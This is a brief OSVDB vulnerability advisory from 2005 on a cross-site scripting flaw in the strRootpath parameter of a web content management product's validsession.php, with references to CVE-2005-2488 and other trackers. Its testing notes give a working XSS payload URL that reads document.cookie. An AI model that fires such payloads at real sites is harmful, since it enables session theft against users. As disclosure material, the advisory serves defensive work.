web content management validsession.php strRootpath Variable XSS

2005-07-29T09:03:29
ID OSVDB:18522
Type osvdb
Reporter OSVDB
Modified 2005-07-29T09:03:29

Description

Manual Testing Notes

http://[target]/[path]/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.web-content-management.us/ Security Tracker: 1014616 Secunia Advisory ID:16317 Related OSVDB ID: 18524 Related OSVDB ID: 18523 Other Advisory URL: http://www.rgod.altervista.org/webc.html ISS X-Force ID: 21689 CVE-2005-2488 Bugtraq ID: 14464